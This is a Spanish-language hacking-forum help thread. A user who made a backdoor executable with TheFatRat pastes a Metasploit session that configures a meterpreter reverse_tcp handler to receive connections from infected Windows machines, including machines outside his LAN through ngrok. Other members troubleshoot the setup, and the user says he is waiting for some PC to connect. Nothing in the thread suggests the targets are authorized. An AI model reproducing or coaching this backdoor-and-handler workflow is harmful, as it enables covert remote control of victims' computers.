[DUDA]MetaSploit - Conectividad LAN y Fuera LAN

Iniciado por Tharx_, Enero 15, 2018, 12:31:58 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Enero 15, 2018, 12:31:58 AM Ultima modificación: Enero 15, 2018, 12:35:09 AM por RainelU
Tengo una pregunta: ¿por qué será que los dispositivos claramente que le corren el windows no se conectan a mi dispositivo? Cuando veo un tutorial en pdf a ellos le aparecen los dispositivos que se quieren conectar a su notebook o como sea, pero a mi no me sale. Aqui dejo el codigo que me sale, aun usando TheFatRat que creo el backdoor ejecutable y cuando termino todo me voy a usar el metasploit y no me sale nada, yo he abierto los puertos y utlizo ngrok para darle un ataque fuera de LAN pero me da un error no se si ando viendo tutoriales y libros de versiones anteriores y eso afecte en algo ¿que me recomiendan?

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~/Escritorio/TheFatRat/output# cd
root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~# msfconsole
                                                 
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.16.15-dev                         ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ]

msf > use multi/handler
msf exploit(handler) > use payload windows/meterpreter/reverse_tcp
[-] Failed to load module: payload
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > sset lhost 192.168.1.103
[-] Unknown command: sset.
msf exploit(handler) > set lhost 192.168.1.103
lhost => 192.168.1.103
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.103    yes       The listen address
   LPORT     8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit
  • Exploit running as background job 0.

  • Started reverse TCP handler on 192.168.1.103:8080

    root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~#[/glow]
<?php
$coder = 'me';

print ("$coder");
?>

Probaste si te sale el mismo error en LAN?

Youtube: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta - Twitter: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Con ese mismo script no, lo intentaré y daré los resultados.
<?php
$coder = 'me';

print ("$coder");
?>

Hola @RaineIU.
Según lo que pones has puesto a la escucha el handler esperando que le llegue alguna conexión.

Código: php
Exploit running as background job 0.
Started reverse TCP handler on 192.168.1.103:8080

No te da ningún error, tan solo te informa de que la operación se esta llevando a cabo en segundo plano.

Solo queda que en maquina se ejecute el payload ya que no estas usando ningún exploit para su ejecución.

Por cierto siempre he escuchado que es mejor usar "run" en vez de "exploit", no tengo ,muy claro por que pero en sus orígenes era así
Código: php
msf exploit(handler) > exploit

Código: php
msf exploit(handler) > run


Un saludo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola @RaineIU.
Según lo que pones has puesto a la escucha el handler esperando que le llegue alguna conexión.

Código: php
Exploit running as background job 0.
Started reverse TCP handler on 192.168.1.103:8080

No te da ningún error, tan solo te informa de que la operación se esta llevando a cabo en segundo plano.

Solo queda que en maquina se ejecute el payload ya que no estas usando ningún exploit para su ejecución.

Por cierto siempre he escuchado que es mejor usar "run" en vez de "exploit", no tengo ,muy claro por que pero en sus orígenes era así
Código: php
msf exploit(handler) > exploit

Código: php
msf exploit(handler) > run


Un saludo.

Gracias Amigo, me quedó entendido. Usaré run a ver como me va, mientras tendré que esperar que el MetaSploit lance que algún pc se conectó a mi pc :C
<?php
$coder = 'me';

print ("$coder");
?>